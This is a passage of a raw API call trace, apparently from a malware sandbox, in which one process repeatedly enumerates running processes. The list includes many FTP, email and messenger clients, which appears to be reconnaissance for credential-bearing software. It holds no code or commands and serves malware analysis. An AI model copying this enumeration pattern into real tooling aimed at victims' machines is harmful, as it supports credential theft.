hotel.exe")) returned 1 [0291.397] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0291.398] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0291.400] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0291.436] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0291.437] CloseHandle (hObject=0x21f8) returned 1 [0291.437] Sleep (dwMilliseconds=0x64) [0291.746] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0291.756] Process32First (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.757] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0291.759] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0291.760] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.764] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0291.767] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.769] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0291.771] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0291.772] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0291.774] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.775] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.779] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0291.780] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.782] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.783] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.785] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.786] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.787] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.789] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.791] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0291.890] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0291.892] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0291.894] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.896] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0291.897] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0291.899] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0291.900] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0291.905] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0291.907] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.910] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0291.913] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0291.919] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0291.921] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0291.923] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0291.924] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0291.926] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0291.928] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0291.930] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0291.932] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0291.953] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0291.956] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0291.958] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0291.960] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0291.962] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0291.968] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0291.970] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0291.973] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0291.975] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0291.977] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0291.985] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0291.987] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0291.989] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0291.992] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0291.994] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0292.106] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0292.107] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0292.109] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0292.111] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0292.113] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0292.115] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0292.117] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0292.119] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0292.124] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0292.126] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0292.128] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0292.130] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0292.132] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0292.134] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0292.139] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0292.141] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0292.143] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0292.145] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0292.147] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0292.157] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0292.159] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0292.162] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0292.165] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0292.167] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0292.173] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0292.175] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: 